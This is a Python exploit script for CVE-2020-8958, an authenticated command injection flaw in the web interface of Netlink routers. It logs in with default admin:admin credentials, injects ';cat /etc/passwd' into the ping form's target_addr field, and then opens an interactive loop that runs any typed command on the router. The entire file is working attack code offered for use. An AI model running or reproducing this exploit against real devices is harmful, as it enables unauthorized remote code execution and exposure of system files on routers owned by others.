CVE-2020-8958.py

#!/usr/bin/python

import sys
import requests
import argparse
from colorama import init, Fore
from bs4 import BeautifulSoup

# debug msgs from the web interface
success_string = "ERROR:you have logined! please logout at first and then login!"
forbidden_string = "403 Forbidden"
bad_string = "ERROR"

# aestheix, coz its important
init(autoreset=True)

def getShell():
    #  check if we can read /etc/passwd
    print(Fore.GREEN + "[+] imma get the shell.. ᕕ( ᐛ )ᕗ")
    payload = dict(target_addr=';cat /etc/passwd', waninf='LAN')
    c = requests.post('http://%s/boaform/admin/formPing' %
                      IP_ADDR.strip('http://').strip('/'), data=payload)

    if "admin" in c.text:
        print(Fore.GREEN + "[+] Got shell!")
        # execute commands!
        while True:
            cmd = input("(router)# ")
            payload = dict(target_addr=';'+cmd, waninf='LAN')
            resp = requests.post('http://%s/boaform/admin/formPing' % 
                        IP_ADDR.strip('http://').strip('/'), data=payload)
            soup = BeautifulSoup(resp.text, "html.parser")
            # print("DEBUG: got response!" + resp.text)
            findpre = str(soup('pre'))
            strippre = findpre.strip("[<pre>").strip("</pre>]")
            print(strippre)
        

def logIn():
    creds = dict(username=USERNAME, psd=PASSWORD) # trying to login with the default creds.
    login = requests.post('http://%s/boaform/admin/formLogin' %
                          IP_ADDR.strip('http://').strip('/'), data=creds)
    if bad_string not in login.text:
        # print("DEBUG: " + login.text)
        print(Fore.GREEN + "[+] Logged in!")
        getShell()
    elif bad_string in login.text:
        print(Fore.RED + "[-] Failed to login with default credentials!")
        exit(1)


def main():
    # pinnalla myru
    print(Fore.YELLOW + "\n  (∩ ͡° ͜ʖ ͡°)⊃━☆ﾟ. * \n") 
    print("CVE-2020-8958 / pwning netlink routers\n")
    try:
        print(Fore.BLUE + "[*] checking router boi..")
        login = requests.get('http://%s/boaform/admin/formLogin' %
                            IP_ADDR.strip('http://').strip('/'))

        # print(login.text)
        if login.status_code == 404:
            print(Fore.RED + "[-] Could not locate login page.")
            exit(1)
        if bad_string or forbidden_string in login.text:
            logIn()       # should be logged in to work.
        if success_string in login.text:
            getShell()
        if login.status_code == 403:
            print(Fore.RED + "[!] 403: too many requests, come back later!")
            exit(1)
    except requests.exceptions.RequestException as e:
        print(Fore.RED + "[-] An error occurred. %s" % e)
        exit(1)

if __name__ == "__main__":
    # arg parsing
    # will use the default cred "admin:admin" when no cred is provided.
    parser = argparse.ArgumentParser(prog="CVE-2020-8958.py", description="CVE-2020-8958: Authenticated remote code execution exploit")
    parser.add_argument("-i", "--Url", required=True, help="Target IP of router")
    parser.add_argument("-u", "--User", type=str, help="Username", const="admin", nargs="?")
    parser.add_argument("-p", "--Pass", type=str, help="Password", const="admin", nargs="?")

    args = parser.parse_args()

    IP_ADDR = args.Url
    USERNAME = args.User
    PASSWORD = args.Pass
    main()   # here we go.